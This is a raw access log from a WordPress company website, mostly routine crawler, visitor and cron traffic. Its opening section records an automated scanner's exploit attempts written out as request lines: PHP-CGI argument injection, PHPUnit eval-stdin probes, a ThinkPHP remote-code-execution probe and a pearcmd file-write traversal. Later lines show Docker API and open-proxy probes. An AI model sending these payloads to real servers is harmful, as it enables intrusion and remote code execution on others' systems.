102.204.223.186 - - [04/Dec/2025:05:26:20 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 152189 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:20 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:21 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:21 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:22 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:23 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:23 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:23 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:24 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:24 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:24 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:24 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:24 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:24 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:26 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:26 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:26 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:26 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:26 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:27 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:27 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:27 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:27 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:28 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:28 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:29 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:29 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:29 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:29 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:30 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:30 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:31 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65390 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:41 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:43 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 152189 "-" "libredtail-http"
36.133.115.36 - - [04/Dec/2025:05:26:50 +0800] "POST /wp-cron.php?doing_wp_cron=1764797209.9866991043090820312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
102.204.223.186 - - [04/Dec/2025:05:26:50 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 152189 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:52 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
102.204.223.186 - - [04/Dec/2025:05:26:55 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [04/Dec/2025:05:36:13 +0800] "POST /wp-cron.php?doing_wp_cron=1764797773.8209290504455566406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [04/Dec/2025:05:36:14 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:05:56:23 +0800] "POST /wp-cron.php?doing_wp_cron=1764798983.0494999885559082031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:05:56:23 +0800] "GET / HTTP/1.1" 200 33527 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:05:57:28 +0800] "POST /wp-cron.php?doing_wp_cron=1764799048.5889570713043212890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
180.153.236.252 - - [04/Dec/2025:05:57:28 +0800] "GET / HTTP/1.1" 200 33527 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36; 360Spider"
36.133.115.36 - - [04/Dec/2025:06:00:27 +0800] "POST /wp-cron.php?doing_wp_cron=1764799227.5036230087280273437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.237.36.31 - - [04/Dec/2025:06:00:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
121.237.36.31 - - [04/Dec/2025:06:00:28 +0800] "GET / HTTP/1.1" 200 33527 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.115.36 - - [04/Dec/2025:06:01:09 +0800] "POST /wp-cron.php?doing_wp_cron=1764799269.1876220703125000000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.237.36.29 - - [04/Dec/2025:06:01:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)"
36.133.115.36 - - [04/Dec/2025:06:08:07 +0800] "POST /wp-cron.php?doing_wp_cron=1764799686.9647409915924072265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.249.68.70 - - [04/Dec/2025:06:08:07 +0800] "GET /news/page/2/ HTTP/1.1" 200 17994 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [04/Dec/2025:06:29:05 +0800] "POST /wp-cron.php?doing_wp_cron=1764800945.2657721042633056640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.121 - - [04/Dec/2025:06:29:05 +0800] "HEAD /Zh6d HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
36.133.115.36 - - [04/Dec/2025:06:33:22 +0800] "POST /wp-cron.php?doing_wp_cron=1764801202.3448638916015625000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [04/Dec/2025:06:33:22 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:06:43:44 +0800] "POST /wp-cron.php?doing_wp_cron=1764801824.6368100643157958984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [04/Dec/2025:06:43:44 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
193.142.147.209 - - [04/Dec/2025:06:43:45 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [04/Dec/2025:06:45:45 +0800] "POST /wp-cron.php?doing_wp_cron=1764801945.6887800693511962890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.130.116.87 - - [04/Dec/2025:06:45:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.116.87 - - [04/Dec/2025:06:45:48 +0800] "GET / HTTP/1.1" 200 33526 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [04/Dec/2025:06:46:25 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
121.43.153.135 - - [04/Dec/2025:06:46:45 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:07:34:03 +0800] "POST /wp-cron.php?doing_wp_cron=1764804843.0812029838562011718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.122.14.96 - - [04/Dec/2025:07:34:03 +0800] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 404 8983 "-" "python-requests/2.25.1"
204.76.203.212 - - [04/Dec/2025:07:34:25 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:07:35:14 +0800] "POST /wp-cron.php?doing_wp_cron=1764804914.3661339282989501953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
110.249.202.209 - - [04/Dec/2025:07:35:14 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [04/Dec/2025:07:46:37 +0800] "POST /wp-cron.php?doing_wp_cron=1764805597.6373579502105712890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.166.226.57 - - [04/Dec/2025:07:46:37 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.226.57 - - [04/Dec/2025:07:46:39 +0800] "GET / HTTP/1.1" 200 33526 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [04/Dec/2025:07:49:27 +0800] "POST /wp-cron.php?doing_wp_cron=1764805767.4663929939270019531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [04/Dec/2025:07:49:27 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:08:02:08 +0800] "POST /wp-cron.php?doing_wp_cron=1764806527.9665739536285400390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
182.253.38.112 - - [04/Dec/2025:08:02:08 +0800] "GET / HTTP/1.1" 200 152189 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:08:20:04 +0800] "POST /wp-cron.php?doing_wp_cron=1764807604.4880430698394775390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.34.213.150 - - [04/Dec/2025:08:20:05 +0800] "GET / HTTP/1.1" 200 109842 "-" "-"
36.133.115.36 - - [04/Dec/2025:08:22:00 +0800] "POST /wp-cron.php?doing_wp_cron=1764807720.8003380298614501953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:08:22:01 +0800] "GET / HTTP/1.1" 200 33524 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:08:27:16 +0800] "POST /wp-cron.php?doing_wp_cron=1764808036.8406720161437988281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
147.135.213.11 - - [04/Dec/2025:08:27:16 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
147.135.213.11 - - [04/Dec/2025:08:27:19 +0800] "GET /portfolio-tag/%E9%9E%8D%E9%92%A2%E8%92%82%E6%A3%AE/ HTTP/1.1" 200 22760 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
147.135.213.11 - - [04/Dec/2025:08:27:21 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22126 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
147.135.213.11 - - [04/Dec/2025:08:27:24 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E6%9D%BF/ HTTP/1.1" 200 22146 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
36.133.115.36 - - [04/Dec/2025:09:01:13 +0800] "POST /wp-cron.php?doing_wp_cron=1764810073.9023630619049072265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.170 - - [04/Dec/2025:09:01:14 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:09:09:06 +0800] "POST /wp-cron.php?doing_wp_cron=1764810546.7395160198211669921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [04/Dec/2025:09:09:07 +0800] "GET / HTTP/1.1" 200 33526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [04/Dec/2025:09:17:39 +0800] "POST /wp-cron.php?doing_wp_cron=1764811059.1840078830718994140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
42.48.38.77 - - [04/Dec/2025:09:17:39 +0800] "HEAD http://110.242.68.4/ HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
42.48.38.77 - - [04/Dec/2025:09:17:39 +0800] "HEAD http://cqqizhou.com/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:44 +0800] "GET http://dongtaiwang.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:44 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:44 +0800] "GET http://36.248.23.149:9080/shx_691/callForErrByName.action HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:45 +0800] "GET http://www.soso.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:45 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:45 +0800] "GET http://36.248.23.149/shx_691/callForErrByName.action HTTP/1.0" 404 31368 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:45 +0800] "GET http://36.248.23.149:9080/shx_691/callForErrByName.action HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:09:17:46 +0800] "POST /wp-cron.php?doing_wp_cron=1764811066.3798949718475341796875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
1.83.125.230 - - [04/Dec/2025:09:17:46 +0800] "GET http://www.minghui.org/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:46 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
1.83.125.230 - - [04/Dec/2025:09:17:46 +0800] "GET http://36.248.23.149/shx_691/callForErrByName.action HTTP/1.0" 404 31368 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
116.52.141.138 - - [04/Dec/2025:09:17:47 +0800] "GET http://www.epochtimes.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
116.52.141.138 - - [04/Dec/2025:09:17:48 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
36.133.115.36 - - [04/Dec/2025:09:38:40 +0800] "POST /wp-cron.php?doing_wp_cron=1764812320.2319500446319580078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
114.119.143.39 - - [04/Dec/2025:09:38:40 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
36.133.115.36 - - [04/Dec/2025:09:55:00 +0800] "POST /wp-cron.php?doing_wp_cron=1764813300.4060890674591064453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
185.242.226.102 - - [04/Dec/2025:09:55:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.102 - - [04/Dec/2025:09:55:06 +0800] "GET / HTTP/1.1" 200 33988 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:37 +0800] "GET / HTTP/1.1" 200 33988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:38 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:40 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1762870941" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:41 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:41 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:43 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:43 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:43 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:43 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:43 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.19 - - [04/Dec/2025:09:58:43 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
